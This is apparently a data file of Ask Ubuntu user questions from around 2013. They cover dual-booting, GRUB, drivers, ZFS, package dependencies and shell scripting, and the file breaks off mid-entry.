305796	how can i dual-boot ubuntu 12.04 with windows 8 ?	i 've been trying to dual-boot ubuntu alongside windows 8 on my thinkpad t530 , with no consistent success . i was able to burn the .iso image for 12.04 onto a dvd and then boot the dvd at startup , and finally install ubuntu on a separate partition ( done on ubuntu installation menu ) . i was able to explore around ubuntu for a while , but this had to be done while secureboot was off . if i restarted , i would n't be able to access windows 8 unless i went to bios and turned secureboot on . once on , windows would take me to the this screen ( where the options would be windows 8 and ubuntu , i had tried to install ubuntu on previous occasions , to no avail as explained above ) . once i click ubuntu , this screen appears . if secureboot was off , i was able to access the grub2 menu and go from there to access ubuntu . so ... all this was yesterday . i turned my laptop on today and am not able to access ubuntu if secureboot is on or off . only windows 8 . any idea how i can fix this ? i have a ubuntu partition that i can not access anymore , and my dual-boot screen for windows does not work for ubuntu . i understand that i must have done the installation for ubuntu on my win8 incorrectly , any way to fix this without a clean reinstall or harddrive restore ? thanks a lot for the help .
305798	rhythmbox plugin to browse your music by folders	rhythmbox is good player but there is no choice to browse music file in folder browser . is there a workaround available ?
305800	before my performance was slow . now my virtualbox virtual machine saids `` no bootable medium found '' !	can anybody please help me here ? a couple of days ago , i asked on this website , how to speed up performance on ubuntu 13.04 . now i just got a message saying `` fatal : no bootable medium found ! system halted . something i did not want to see . all i did was extend a bit of memory . i made it from a iso image downloaded from ubuntu.com . why did it fail ? adrian ,
305804	in thunderbird 17.0.6 , how do i remove the [ gmail ] folders ?	currently , my gmail is linked on thunderbird . i have already gone to account settings > copies & folders but the default folders are still there . so now i have 2 drafts , 2 sent , 2 trash and 2 junk folders . one is on the main inbox while the others are in [ gmail ] folder . i want to hide those and map them to the actual folders instead . how do i do this ?
305805	can i operate ubuntu os stricktly through interface ? without being forced to operate through command line ?	i am no computer nor ubuntu expert , but i absolutely love it . please help ! i need to know how to add media players , upgrade adobe flash , and operate software for hardware products .
305808	delete and arrow keys not working	after installing 12.04 and gnome shell , i find that the arrow and delete keys , along with the insert , home , page up & down , and end keys have stopped working . all these keys now appear to be xf86monbrightnessdown whatever that is . any fix for this ?
305813	keyboard layout order : last language is always the same	i use ubuntu 13.04 with unity . i have 3 keyboard layouts : english , russian and ukrainian , and i want to set the switching shortcut to `` caps to first , shift + caps to last '' . the problem is that the last layout is always ukrainian , regardless of order set in system settings ( all settings - > keyboard layout ) . how do i make russian the last layout so that it would be turned on by shift + caps ?
305817	ubuntu is not installing on vaio with windows 8	i tried installing ubuntu on sony vaio 15126 with windows 8 preloaded in it . i was unable to install and could not boot from the dvd too . could i get the steps to be followed . thanks !
305818	how do i get wifi to work ?	i have 12.04 lts on a toshiba portege r835-p56x . i try to connect to my home network over wifi . it connects , but i ca n't access the internet . i tried resetting the router , but that did n't work . please help !
305820	fresh 13.04 install - laptop keyboard & touchpad not working	i 'm installing 13.04 ( 64 bit ) from dvd on an alienware m17x r4 laptop , dual-booting with win 7 . within the installer/live cd , both mouse and touchpad work . however , after installation when i boot into ubuntu , neither mouse nor touchpad work - i 'm stuck at the login screen . ctrl+alt+fn does n't drop me into a terminal either . if i boot into ubuntu recovery mode , i can get to the root shell etc and the keyboard works . what i 've tried : dpkg option in ubuntu recovery mode chrooting into the install via the live cd ( probably could have used root shell in recovery mode ) and running `` apt-get update ; apt-get upgrade '' installed nvidia graphcis drivers . installed linux-image-extra-uname -r setting acpi=false , as well as i8042.reset in grub redownloaded & did another fresh install similar to this bug report : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1172852 except that his recovery mode was broken and mine is not . what would you recommend ?
305821	â-bash : /usr/bin/ : no such file or directoryâ for almost every command	while trying to solve some package conflicts , mistakenly i ran this command on my ubuntu-precise : sudo dpkg -r -- force-all libc6 consequently in a second all of the packages with a dependency to libc6 are removed , and whatever command i run , i get -bash : /usr/bin/my_command : no such file or directory i can access the /bin/busybox but then when i want to reinstall libc6 package via /bin/busybox dpkg -- force-depends -i install libc6 i get `` permission denied '' . the sudo command of course does n't work either ! ! does anyone has a suggestion on how i can install unistalled packages !
305822	ubuntu 13.04 : `` failed to fetch.. '' when running update . is this package important ?	w : failed to fetch http : //ppa.launchpad.net/chicharreros/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . that was the message i got . if the package is important , how can i fix the error ?
305823	what is the best way to run .exe files in ubuntu 13.04 ?	i have heard about programs like wine that allow ubuntu users to run .exe files . which program should i use , and how should i use it ?
305830	replacing a dead disk in a zpool	i 'm running ubuntu server 13.04 64-bit using native zfs . i have a zpool consisting of 4 hard drives of which one died yesterday and now is not being recognized by the os or the bios anymore . unfortunately i saw the problem only after the next reboot so now the drive label is missing and i ca n't replace the disk using the official instructions here and here . zpool status hermes -x prints root @ zeus : ~ # zpool status hermes -x pool : hermes state : degraded status : one or more devices could not be used because the label is missing or invalid . sufficient replicas exist for the pool to continue functioning in a degraded state . action : replace the device using 'zpool replace ' . see : http : //zfsonlinux.org/msg/zfs-8000-4j scan : scrub repaired 0 in 2h4m with 0 errors on sun jun 9 00:28:24 2013 config : name state read write cksum hermes degraded 0 0 0 raidz1-0 degraded 0 0 0 ata-st3300620a_5qf0mjfp online 0 0 0 ata-st3300831a_5nf0552x unavail 0 0 0 ata-st3200822a_5lj1chms online 0 0 0 ata-st3200822a_3lj0189c online 0 0 0 errors : no known data errors i already replaced the drive with a new one ( which got the label /dev/disk/by-id/ata-st3500320as_9qm03atq ) any one of the commands zpool replace hermes /dev/disk/by-id/ata-st3300831a_5nf0552x /dev/disk/by-id/ata-st3500320as_9qm03atq zpool offline hermes /dev/disk/by-id/ata-st3300831a_5nf0552x zpool detatch hermes /dev/disk/by-id/ata-st3300831a_5nf0552x fails with root @ zeus : ~ # zpool offline hermes /dev/disk/by-id/ata-st3300831a_5nf0552x can not offline /dev/disk/by-id/ata-st3300831a_5nf0552x : no such device in pool because the label of the drive that died does not exist in the system any more.i also tried the commands above omitting path to the drive 's label to no avail . how can i replace the `` ghost '' disk ?
305833	auto mount a drive that located on ubuntu and auto share that drive for window	i have tried to find the solution for many days but i could n't find one . all are posted about auto mount a share folder that come from window . but my case the backup drive is located on ubuntu 12.04 desktop and i would like to have my drive ( /dev/sda3 ) mount at boot time then auto share that drive for accessing from window users . could you please help me !
305835	why are some checkboxes in software updater disabled ?	in ubuntu 13.04 , the software updater shows some apps as having updates , but they 're non-selectable : it 's not clear why they 're greyed out . on the command line : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : gnuplot-nox gnuplot-x11 nvidia-current 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . note too that running apt-get dist-upgrade does not cause them to be installed either , as it sometimes does with packages that are kept back . here 's the output : $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : gnuplot-nox gnuplot-x11 nvidia-current 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . i took @ quidage 's suggestion , which gives the following . however subsequent upgrades show the same message : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded .
305839	black screen when starting from liveusb	i am trying to get ubuntu 12.04 onto my computer and when i boot up the liveusb ( do n't have a cd drive ) , i can see the grub boot screen but it does n't show up the ubuntu installation gui . anyways , when i click on it , it just goes to a completely blank screen . no sound or anything . i have tried the acpi=off method and several others . none have worked . i have also tried the wubi install . here are my specs : motherboard : msi ms-7786 ram : 16 gb os ( currently ) : windows 8 enterprise 64 bit processor : amd a8-3870 ( 3.8 ghz ) note : this is not a duplicate . i have tried every other method out there , and have researched stackexchange ( yes , the whole thing ) very thoroughly .
305840	equivalent for help & manual	i 'm trying to create a help document for an application , but i could n't find a program who does this . in windows i used to work with help & manual , which is a content management system for creating documentation . is n't there an equivalent for this program in ubuntu ?
305842	new install and i ca n't get ubuntu to work	first of all what happened > i made an ubuntu live usb to install ubuntu raring ringtail . after ubuntu said that `` it has installed successfully and you need to restart your computer '' ( why it does n't said that please remove any attached usb or cd/dvd before restart ? ) i thought it may require the usb further ( i 'm a newbie ) so i did n't removed it . after restart ubuntu started the installation setup again . then i clicked cancel and quit the setup . it came to desktop with a visible icon saying `` install ubuntu '' . i shut downed it but it got stuck in the shut down process . finally i pulled the plug out and turned off my computer . i started it again . is that a good install ? with one mistake of ubuntu to not telling me to deattach any connected usb , i had to do that . now this is what i 'm experiencing : it is always getting hanged while switching accounts . the other account just blink here and there , shows a cropped part of the desktop with nothing clickable . so cold reboot is the only method to get rid of it as i ca n't do anything . ( in the last i 've disabled all accounts including guest ) . while on lock screen the button `` switch account '' is unclickable . it is just faded away and only sometimes appear to be clickable but mostly not . even after selecting automatic login to off , it is not asking me for my password during startup and i only have to click login to go to my destop . as i lock my screen , screen just turn black ( why ? ) and only after waving my mouse a bit or pressing any key make the password field apppear . i ca n't rely on ubuntu . should i ? my comp . specs : processer : intel core 2 duo ram : 1 gb video memory : 128 mb bonus big mistake of ubuntu : when installing , i chose replace windows xp with ubuntu . ah ! i thought it will just replace my windows xp but it wiped out my whole disk and eveything . wtf !
305843	enable wireless on ubuntu on a mac pro 1.1	how do i get my wireless working , i just installed ubuntu on my 2006 mac pro 1.1
305844	ubuntu default terminal in lubuntu	recently i had to re-install my linux os , and now i ran into some annoying problems . i had ubuntu , and then i installed the lubuntu desktop enviroment . i do not like lxterminal but i was able to use the default ubuntu terminal in lubuntu . since the new instalation , both ubun . and lubun. , i have not been able to start the ubun . terminal in the lubun . desktop enviroment . i can start lxterminal , and i see that the ubuntu default terminal is installed , but i can not find it // start it while im in the lubuntu environment . i was wondering where the terminal is and how can i get it into to show up in the accessories . i really really dislike lxterminal : ( thank you for your help .
305848	live dvd single user mode	i am tying to boot into single user mode using a live dvd , but i have had little luck , i heard that i should hold down the shift key during start up but it gave some messages then it continued to boot into the desktop mode .
305849	are there sync ( ing ) programs available that can sync my newer files to the older files ?	i have two identical linux distrbiutions installed ; one on the hard disk , and one on the usb . i was wondering if there is a way of syncing the whole file system , copying the newer files to the old ones .
305850	remote clean up	i heard of `` pcmatic.com `` that will improve your computer online , and others like this . is such a thing possible and does ubuntu have anything to do such a operation to a computer like mine via the web ?
305854	how to sync iphone 4s/ipod ( ios6.1.3 ) on 13.04	i 'd like to sync my music and transfer it to my iphone in ubuntu 13.04 . trouble is i 've tried using banshee , rhythmbox , gtkpod and nothing happens . banshee goes through the process of viewing/adding tracks and it even `` appears '' to sync music , but when i check it on my iphone , there is absolutely no music on the device . over at the libimobiledevice.org website , it states latest release : 1.0.7 development/unstable release : 1.1.5 tested with ipod touch 1g/2g/3g/4g , iphone 1g/2g/3g/3gs/4/4s/5 , ipad 1/2/3rd gen and apple tv running up to firmware 6.1.3 on linux , mac os x and windows . so i believe i should be able to sync my device . however ubuntu 's version of libimobiledevice is 1.1.4 , so how can i update that package exactly ? i do n't really want to use an unstable package to get syncing to work , but i 've found no other solutions . i have even tried installing itunes with playonlinux and sadly , syncing is not supported with wine at this time . any suggestions ? any help would be much appreciated .
305855	reformat the screen resolution	i have a graphics card that support 1024 by 1024 resolution and a 17 inch dell monitor . the screen is really zoomed in and i ca n't see the entire desktop . i also get an error when i try and change the resolution that says the video card hardware does not support the resolution needed for the monitor . is there any way i can make this setup work , like move around the desktop or not use all of the monitor ?
305856	how to remove bluetooth manager in xubuntu	i wan na remove bluetooth manager and its daemon from xubuntu because my computer does n't have bluetooth device . how should i do ? note : i 've searched questions http : //askubuntu.com/search ? q=remove+bluetooth but i find nothing . wish i do n't create duplicate question
305858	how to know process pid of bash function running as child ?	i am trying to know the pid of a function that was run as child process on a script functstpsself.sh # ! /bin/bash echo `` pid= $ $ ; ppid= $ ppid '' ps -p $ $ function functstpsself ( ) { sleep 3 ; echo `` $ funcname : pid= $ $ ; ppid= $ ppid '' ; ps -p $ $ -o pid , ppid , command ; } functstpsself & sleep 1 ; but it ca n't find the pid ! what now ?
305859	how to match a file extension name in a file	i want to move a file into a directory , example i have file name extlist , its contains .exe .lnk .inf i try to use script like this # ! /bin/sh a=`cat /home/harits/extlist` for f in $ ( find -type f -name `` *. $ a '' ) do if [ [ ( this is difficult part ) == $ f ] ] then mv $ f else echo `` fail '' fi done and i want to move that file while it have same extension in extlist , should i use bash manipulation string ? sorry for my creepy english.. , please guide me here..
305860	where can i download ubuntu-10.04-destktop-amd64.iso file ?	i ca n't find ubuntu-10.04-destktop-amd64.iso on http : //www.ubuntu.com/download . where i can find it ? thank you
305861	how to add odd to `` devices '' in file system ?	how can you add a dvd+/-rw disk drive to devices under file system ? do you need to mount it first ?
305864	swap hdd to change os ?	i 'm going to a lan tomorrow , however , they all use windows and we 're planning on playing some games that are only for windows . i have a laptop with a pretty sdd of 60gb with ubuntu that works perfect so far . however , with a partition of windows+game , the space might become a problem . so i was thinking about doing this , but wanted to know if it was going to work before spending 2+ hours by asking here . i have my original 256gb hdd . if i install windows there from the actual laptop , can i swap then to ubuntu seamlessly by just swapping the hdd for the ssd ? the only info i could find in google was changing the hdd from one computer to another , which would not work for the devices installed , but since this would use 2 different disks for the same computer ( physically changing them ) , i thought it might work . so , my question is , will ubuntu and windows run after installing windows in that way ? my main concern has to do with the bios getting modified by a not so play-along windows and not letting me boot ubuntu then , but i 'm not sure how that works and i am not aware of other potential problems . are you ? notes : tried both wine and virtualbox ; none worked . i do n't want to delete ubuntu . it works like a charm for my daily use . it 's fine physically swapping ssd for hhd and back in the laptop ; it will likely be done once or twice in its lifetime .
305873	slow performance ... hard drive problem ?	i had my laptop run out of battery twice in the last two weeks . i went to go start it right after plugging it back in , and it hung on the `` ubuntu '' screen with the little dots . i started it in the `` recovery mode '' setting and it sometimes says it ca n't mount my drive . now , even when it does load , my computer is running really slowly . it 's nothing like it used to be ... and now the brightness buttons do n't work either . i have a hard time believing these things are related , but i guess they might be ! my wife said that before the computer shut down she heard a lot of mechanical noise from the laptop . like it was running the fans and spinning the hard drive . i 've got an asus a55v with 13.04 installed . edit : i also just realized that the screen moves a little bit left and right when i move the mouse to the far sides of the screen ... it 's almost like the screen of scrolling . is my only option to re install ubuntu ? thanks for any help !
305874	password and music	it has been so long that i have used my password for administrator , how can i reset it ? or do without it ? why does n't the music play on a power point presentation ?
305875	ubuntu does n't work after installed in win8	i got a new laptop with pre-install window8 . i want to keep window8 and also to install ubuntu 12.04 , 64bit . i tried to boot from usb and install ubuntu like i did in win7 , it went well but at the end , there was a warining said no grub . then i use easybcd to add ubuntu into boot entry.it was success . but when i tried again to log in ubuntu , it still did n't work . what should i do ? pls help .
305877	suitable shuttle models for htpc / media centre	are any shuttle models suited as ubuntu based htpc / media centre clients ? i 'm after a compact fanless htpc for the living room to work with a media server ( currently running mythtv ) in my home office . the compact shuttle models look like a suitable form factor but the little info i 've found from googling suggests the chipsets they use might be problematic . does anyone know for sure which models which models are ubuntu / mythtv / xbmc compatable and suite as media centres ? if none of them are , is there anything else in a similar form factor i should be looking at ?
305881	are any zotac zboxs suitable as htpc / media centres ?	are any zotac zboxes suitable as htpc / media centres ? i 'm after a fanless htpc client in the living room to work with my mythtv server in my home office . i like the small compact form factor of the zbox but what little i could find by googling did n't clearly recommend any particular models for ubuntu / mythtv / xbmc . can anyone recommend any models that work with little hassle ? or , if there are n't any , are there other more linux-friendly small format fanless pcs i should be looking at instead ?
305882	how to remove ubuntu 12.04 from dual booting with windows xp with xp installation cd	i have dual booting system with ubuntu 12.04 and windows xp . now i want to remove ubuntu 12.04 and retained windows xp . how do i remove the ubuntu 12.04 with windows xp installation cd command prompt ?
305883	can my pc run ubuntu ?	my computer 's specs are : system : microsoft windows xp professional version 2002 service pack 3 computer : intel ( r ) core ( tm ) 2 duo cpu e7500 @ 2.93 ghz 2.93 ghz , 1.99 gb of ram if my computer ca n't run the current version of ubuntu , are there older versions of ubuntu can run on this pc ?
305884	how to install jekyll ?	according to the jekyll site , this is how you make a new website with jekyll : ~ $ gem install jekyll ~ $ jekyll new myblog ~ $ cd myblog ~/myblog $ jekyll serve gem install jekyll did n't work , nor did sudo gem install jekyll : └─ > gem install jekyll error : while executing gem ... ( errno : :eacces ) permission denied - /var/lib/gems/1.9.1/gems/fast-stemmer-1.0.2/license ┌─ [ sat jun 08 ] [ jon @ jon-macmini : ~/web ] └─ > sudo ! ! sudo gem install jekyll building native extensions . this could take a while ... error : error installing jekyll : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- mkmf ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:1 : in ` < main > ' gem files will remain installed in /var/lib/gems/1.9.1/gems/fast-stemmer-1.0.2 for inspection . results logged to /var/lib/gems/1.9.1/gems/fast-stemmer-1.0.2/ext/gem_make.out i also tried following the answer here , but that does n't help . sudo apt-get install jekyll works . even then , though , running jekyll new myblog returns this error : └─ > jekyll new myblog /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : iconv will be deprecated in the future , use string # encode instead . warning : could not read configuration . using defaults ( and options ) . no such file or directory - new/_config.yml building site : new - > myblog /usr/lib/ruby/vendor_ruby/jekyll/site.rb:126 : in `chdir ' : no such file or directory - /home/jon/web/new/ ( errno : :enoent ) from /usr/lib/ruby/vendor_ruby/jekyll/site.rb:126 : in `read_directories' from /usr/lib/ruby/vendor_ruby/jekyll/site.rb:98 : in `read' from /usr/lib/ruby/vendor_ruby/jekyll/site.rb:38 : in `process' from /usr/bin/jekyll:250 : in ` < main > ' anyone know what 's causing this ?
305898	unable to mount windows partition - not hibernated or fast restarted	i having some trouble installing ubuntu on my computer . i think the issue is with my windows partition not being mounted correctly . i am currently `` trying '' ubuntu using liveusb . i am able to mount every single partition except for my windows 8 partition . when i try to mount it , it says error mounting /dev/sdb5 at /media/ubuntu/os : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sdb5 '' `` /media/ubuntu/os '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sdb5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . now , i am quite sure i shut down my windows partition before starting liveusb . i also disabled fast restart on my windows os . what is going wrong here ?
305906	unity not coming up after 12.10 - > 13.04 upgrade	i upgraded from 12.10 to 13.04 . when i start ubuntu , i get to the login screen fine and can input my password and login . however , after i log in , i 'm greeted with just a blank screen that has only the default desktop wallpaper on it and nothing else . i can open up a terminal using ctrl-alt-t but i could n't really figure out where to go from there to fix this problem . i 'm thinking a reinstall of some packages may cure this . suggestions ? ( thanks in advance )
305907	i ca n't open ubuntu software center	i downloaded google chrome that was made for my computer from https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb . for some reason after i installed i ca n't open . also in the corner where the time and other things are there 's this red circle with a white dash in the middle of it . it says `` an error occured , please run package manager from the right click menu or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : '' ( e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . ) ' this usually means that your installed packages have unmet dependencies .
305918	ubuntu 12.04 boot error , i/o error	ububtu is failing to boot into the gui . i have tried using boot repair but it failed to work : http : //paste.ubuntu.com/5747328 i installed recommended updates yesterday . image of error for your reference : thank you for your help !
305920	how resize of video in terminal ?	i have video with size 560x288 . i would like video with size 500x250 ( change ratio and cut off rest ) . how to in terminal , please ?
305921	what compiz addons/plugins are available ?	how many compiz addons can i get and what do they do ? can i get one that make it possiable for me to turn windows and tab then like in haiku .
305922	computer restarts while downloading ubuntu	i have a question . while downloading the ubuntu iso file , my computer restarts randomly . why does this happen ? what should i do ? the browsers i have tried are firefox and chrome . i use windows 8 . i have tried both the versions 13.04 and 12.10 . please help me . and is there a way to legally torrent ubuntu ? thanks in advance .
305928	error : attempt to read or write outside of disk `` hdo '' . grub rescue <	new pc , set up win 7 , removed win 7 to install ubuntu 13.04 , installed fine . once the disk is removed , at boot up it gives error : attempt to read or write outside of disk `` hdo '' . grub rescue < what needs to be done . thx
305934	icedtea plugin not working in midori web browser	i have lubuntu 13.04 , and i use the midori webbrowser . i initially had a problem with the plugins , but later on , i could activate flash and java . i use the icedtea browser plugin to view java content . this works perfectly fine with chromium , but it fails to load in midori . sometimes , it even says missing plugin for both flash and java . in reviews , i have seen it reported that java works fine in midori even with icedtea . it would be helpful if you could say what the problem is , and help me solve this problem . edit : i have the latest version of java and flash . also , the website i tested for java , is the java test page in the java website , and also minecraft.net . for flash , it is youtube .
305935	installation problem of ubuntu 12.04.2 in virtualbox on windows 7 host	when i 'm trying to install ubuntu 12.04.2 in virtualbox on windows 7 host , it is getting installed . but , after pressing on restart now button , the virtualbox is not responding and it is getting aborted . i am using windows 7 professional and virtualbox-4.2.12 . please help me with this . i 'm facing the same problem with ubuntu 13.04 too . i have no other operating systems running in virtualbox
305939	is there any way to run the application on internet ?	can you provide any links or guideline steps to execute the application ( for example to run currency converter program ) on internet directly without installation of any software . like using online compiler ... ..
305940	reinstalled ubuntu 12.04 and now i can not change preferences like theme , wallpaper , and nautilus preferences	so i just down-rev 'd ubuntu from 13.04 back to 12.04 lts desktop 64 ( precise ) . i am using unity . i just reformatted the ubuntu partition , but kept my home directory intact , and everything seemed to reconnect just fine . no data was lost . however , i found that i can not seem to change my preferences . so i can not seem to change my desktop background , no matter how many ways i try -- ubuntu tweak , gnome tweak , system settings . i also can not change the system gtk+ theme , though apparently i am able to change the windows border theme . further , i can not seem to change my nautilus preferences -- so i can not seem the make the default view a list view , and i can not make the `` single-click '' behavior the default . i even went into the nautilus org.gnome.nautilus settings to manually change things , but no luck . i thought it was a permissions issue , so i did a chown on the home folder and on the .gvfs folder . still no luck . so somewhere there seems to be a permission that i am not catching . does anyone have any suggestions ? thanks .
305942	wxwidgets in ubuntu touch ?	i know that ubuntu touch uses qt5 , but i would like to know if it will also support gui like wxwidget .
305946	save webpage contents in a text file	i have following weblink : http : //www.rcsb.org/pdb/explore/sequencetext.do ? structureid=1aps & chainid=a i wish to save only certain parts of this file in a text file , that is , i want only the sequence portion ( with spaces at correct places ) and not the heading or any numbers on that page . secondly , we can see there are spaces after every tenth character in all lines . i would like to remove only the spaces which occur after every tenth character and save this content in another text file . is it possible ? can any one help in this regard ?
305947	13.04 graphics problem	all of a sudden , the graphics are n't working on my ubuntu 13.04 64bit . i ran sudo apt-get upgrade yesterday , and now the launcher and dash transparency do n't work . what 's odd is that the notifications transparency-blur-thingy does work . auto-hiding the launcher also gives me weird results . i have some screenshots : the launcher is not transparent . neither is dash . and that is what the desktop looks like with the launcher on auto-hide . my hardware is a gigabyte h61n motherboard with an intel i3 cpu . what 's wierd is that system settings - > details ca n't make up it 's mind what graphics i have . the output of lspci -nnk | grep -ia3 vga : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0102 ] ( rev 09 ) subsystem : gigabyte technology co. , ltd device [ 1458 : d000 ] 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) subsystem : gigabyte technology co. , ltd device [ 1458:1c3a ]
305954	how was ubuntu first developed ?	i am not a noob to ubuntu . i have been here for a while . the question i am going to ask is basically requiring an explanatory answer , possible with examples . my question is simple . it is as below : - everyone says , ubuntu was developed from debian , by tripping down so many thing , adding something else , giving custom displays , branding , images or backgrounds , etc . my question is how do they do it . was it by just installing a minimal debian distro in a computer system , adding and making changes to that system , adding ubiquity installer to the installed distro , and then creating an iso file ? consider the two scenarios . scenario 1 they mount a cd iso image remove unwanted packages add branding make customizations repack the iso -or- scenario 2 install a debian distro in the pc remove unwanted packages , and install new ones to the installed os apply custom brandings to the installed os make customizations in the installed machine add an installer to the installed os repack the iso what is actually happening ?
305962	setting to only show applications of current workspace in launcher ?	is it possible to have the opened applications of the current workspace in the launcher but not the ones from other workspaces ?
305970	problem with using gnome-screenshot in awesome	i 'm having problem with using gnome-screenshot in awesome wm . here 's the screenshot . i 'm using awesome wm and my linux distro is ubuntu 12.04 . i have no idea how to solve this and what causes this . btw , when invoking the command , in ubuntu 12.04 account , not in awesome wm gnome-screenshot -a there 's no error at all .
305971	disappearing and reappearing ethernet connection	i have internet via ethernet cable plugged in directly into my desktop machine ; windows and ubuntu on the same machine . the problem is that after loggin in internet is working ( though the speed is less than on windows ) for about 10 mins , after which connection disappears : can not ping anything , nslookup is not responding too . then after about 10 mins connection is back . i 'm not much familiar with ubuntu , sorry if some info is missing . i have ubuntu version : 10.04.4 lts codename : lucid ( for some reason i have to stay on 10.04 and can not upgrade to a newer version now ) network interfaces : ~ $ cat /etc/network/interfaces auto lo iface lo inet loopback ethernet controller : ~ $ lspci -v ... 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) subsystem : asustek computer inc. device 8432 flags : bus master , fast devsel , latency 0 , irq 31 i/o ports at d000 [ size=256 ] memory at f2104000 ( 64-bit , prefetchable ) [ size=4k ] memory at f2100000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169 ...
305973	how to install kingsoft office in ubuntu 12.04	i am ubuntu 12.04 user and i want to install kingsoft office but i do n't know how to install it . please tell me the procedure of installation of kingsoft office in ubuntu 12.04 .
305975	xubuntu 13.04 panel items alignment changed	my friend did something on the while i was away and the alignment of the items in both panels changed . the applications menu button and any opened programs are still left-aligned , but the user-name , workspaces and all the other indicators are suddenly left-aligned too . on the bottom panels it 's also left aligned , instead of being centralized .
305979	how to upgrade ubuntu from update manager ?	i am using ubuntu 10.10. and update manager says that ubuntu 11.04 is available . but when i pressed the upgrade button , it says fetching the upgrade failed . there may be a network problem . but my net is working fine , so what is the problem ? ? ?
305987	unmet dependencies for handbrake-gtk	i have reviewed the suggestions at [ how do i resolve unmet dependencies ? ] . as yet , my issue remains . here 's hoping the good folk here can help me . sudo apt-get install handbrake-gtk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : handbrake-gtk : depends : gstreamer1.0-plugins-bad but it is not going to be installed e : unable to correct problems , you have held broken packages . cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //sg.archive.ubuntu.com/ubuntu/ raring main restricted multiverse deb-src http : //sg.archive.ubuntu.com/ubuntu/ raring main restricted multiverse # # major bug fix updates produced after the final release of the # # distribution . deb http : //sg.archive.ubuntu.com/ubuntu/ raring-updates main restricted multiverse deb-src http : //sg.archive.ubuntu.com/ubuntu/ raring-updates main restricted multiverse # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //sg.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //sg.archive.ubuntu.com/ubuntu/ raring universe deb http : //sg.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //sg.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //sg.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //sg.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted multiverse deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main deb http : //archive.canonical.com/ raring partner deb-src http : //archive.canonical.com/ raring partner # # custom software # deb http : //deb.torproject.org/torproject.org raring main # disabled on upgrade to raring deb http : //download.ebz.epson.net/dsc/op/stable/debian/ lsb3.2 main cat /etc/apt/sources.list.d/* deb-src http : //ppa.launchpad.net/banshee-team/ppa/ubuntu quantal main # deb http : //ppa.launchpad.net/chris-lea/node.js/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/chris-lea/node.js/ubuntu quantal main deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu quantal main # deb http : //ppa.launchpad.net/chris-lea/node.js/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu raring main # disabled on upgrade to raring # deb http : //linux.dropbox.com/ubuntu precise main # disabled on upgrade to raring deb http : //linux.dropbox.com/ubuntu precise main # deb http : //linux.dropbox.com/ubuntu precise main # disabled on upgrade to raring # deb http : //ppa.launchpad.net/flacon/ppa/ubuntu raring main # disabled on upgrade to raring # deb-src http : 